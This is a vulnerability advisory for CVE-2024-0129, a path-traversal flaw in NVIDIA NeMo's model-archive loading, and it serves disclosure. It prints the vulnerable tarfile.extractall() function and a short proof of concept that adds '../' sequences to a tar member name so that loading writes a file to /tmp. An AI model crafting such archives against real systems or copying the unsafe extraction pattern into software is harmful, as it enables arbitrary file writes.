NVIDIA NeMo
Vulnerability Report

Unsafe extraction of NeMo archive leading to arbitrary file write

CVE Number

CVE-2024-0129

Summary

The _unpack_nemo_file function used by the SaveRestoreConnector class for model loading uses tarfile.extractall() in an unsafe way which can lead to an arbitrary file write when a model is loaded.

Products Impacted

This vulnerability is present in Nvidia NeMo versions prior to r2.0.0rc0.

CVSS Score: 6.3

AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CWE Categorization

CWE‑22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

Details

The cause of this vulnerability is in the _unpack_nemo_file function within the file /nemo/core/connectors/save_restore_connector.py.

	<span class="token keyword">def</span> <span class="token function">_unpack_nemo_file</span><span class="token punctuation">(</span>path2file<span class="token punctuation">:</span> str<span class="token punctuation">,</span> out_folder<span class="token punctuation">:</span> str<span class="token punctuation">,</span> extract_config_only<span class="token punctuation">:</span> bool <span class="token operator">=</span> <span class="token boolean">False</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> str<span class="token punctuation">:</span>
    	<span class="token keyword">if</span> <span class="token operator">not</span> os<span class="token punctuation">.</span>path<span class="token punctuation">.</span>exists<span class="token punctuation">(</span>path2file<span class="token punctuation">)</span><span class="token punctuation">:</span>
        	<span class="token keyword">raise</span> FileNotFoundError<span class="token punctuation">(</span>f<span class="token string">"{path2file} does not exist"</span><span class="token punctuation">)</span>

    	<span class="token comment"># we start with an assumption of uncompressed tar,</span>
    	<span class="token comment"># which should be true for versions 1.7.0 and above</span>
    	tar_header <span class="token operator">=</span> <span class="token string">"r:"</span>
    	<span class="token keyword">try</span><span class="token punctuation">:</span>
        	tar_test <span class="token operator">=</span> tarfile<span class="token punctuation">.</span>open<span class="token punctuation">(</span>path2file<span class="token punctuation">,</span> tar_header<span class="token punctuation">)</span>
        	tar_test<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
    	<span class="token keyword">except</span> tarfile<span class="token punctuation">.</span>ReadError<span class="token punctuation">:</span>
        	<span class="token comment"># can be older checkpoint => try compressed tar</span>
        	tar_header <span class="token operator">=</span> <span class="token string">"r:gz"</span>
    	tar <span class="token operator">=</span> tarfile<span class="token punctuation">.</span>open<span class="token punctuation">(</span>path2file<span class="token punctuation">,</span> tar_header<span class="token punctuation">)</span>
    	<span class="token keyword">if</span> <span class="token operator">not</span> extract_config_only<span class="token punctuation">:</span>
        	tar<span class="token punctuation">.</span>extractall<span class="token punctuation">(</span>path<span class="token operator">=</span>out_folder<span class="token punctuation">)</span>
    	<span class="token keyword">else</span><span class="token punctuation">:</span>
        	members <span class="token operator">=</span> <span class="token punctuation">[</span>x <span class="token keyword">for</span> x <span class="token keyword">in</span> tar<span class="token punctuation">.</span>getmembers<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">if</span> <span class="token string">".yaml"</span> <span class="token keyword">in</span> x<span class="token punctuation">.</span>name<span class="token punctuation">]</span>
        	tar<span class="token punctuation">.</span>extractall<span class="token punctuation">(</span>path<span class="token operator">=</span>out_folder<span class="token punctuation">,</span> members<span class="token operator">=</span>members<span class="token punctuation">)</span>
    	tar<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
    	<span class="token keyword">return</span> out_folder
Python

The _unpack_nemo_file function is used by several functions and classes in NVIDIA NeMo, most notably the SaveRestoreConnector class which is used to save and load NeMo model files from disk.

To replicate this vulnerability,  you simply need to create a tar archive containing a file with a relative path and load the archive with the SaveRestoreConnector restore_from function:

<span class="token keyword">import</span> tarfile
open<span class="token punctuation">(</span><span class="token string">"test.txt"</span><span class="token punctuation">,</span><span class="token string">"w"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>write<span class="token punctuation">(</span><span class="token string">"This is a test file"</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">change_name</span><span class="token punctuation">(</span>tarinfo<span class="token punctuation">)</span><span class="token punctuation">:</span>
	tarinfo<span class="token punctuation">.</span>name <span class="token operator">=</span> <span class="token string">"../../../../../../../../tmp/"</span> <span class="token operator">+</span> tarinfo<span class="token punctuation">.</span>name
	<span class="token keyword">return</span> tarinfo

<span class="token keyword">with</span> tarfile<span class="token punctuation">.</span>open<span class="token punctuation">(</span><span class="token string">"test.nemo"</span><span class="token punctuation">,</span> <span class="token string">"w:gz"</span><span class="token punctuation">)</span> <span class="token keyword">as</span> tar<span class="token punctuation">:</span>
	tar<span class="token punctuation">.</span>add<span class="token punctuation">(</span><span class="token string">"test.txt"</span><span class="token punctuation">,</span> filter<span class="token operator">=</span>change_name<span class="token punctuation">)</span>


<span class="token comment">#Load the archive with restore_from</span>
<span class="token keyword">import</span> nemo<span class="token punctuation">.</span>collections<span class="token punctuation">.</span>asr <span class="token keyword">as</span> nemo_asr
model <span class="token operator">=</span> nemo_asr<span class="token punctuation">.</span>models<span class="token punctuation">.</span>EncDecDiarLabelModel<span class="token punctuation">.</span>restore_from<span class="token punctuation">(</span>restore_path<span class="token operator">=</span><span class="token string">"test.nemo"</span><span class="token punctuation">)</span>
Python

This results in test.txt being written to the /tmp/ directory:

code on a screen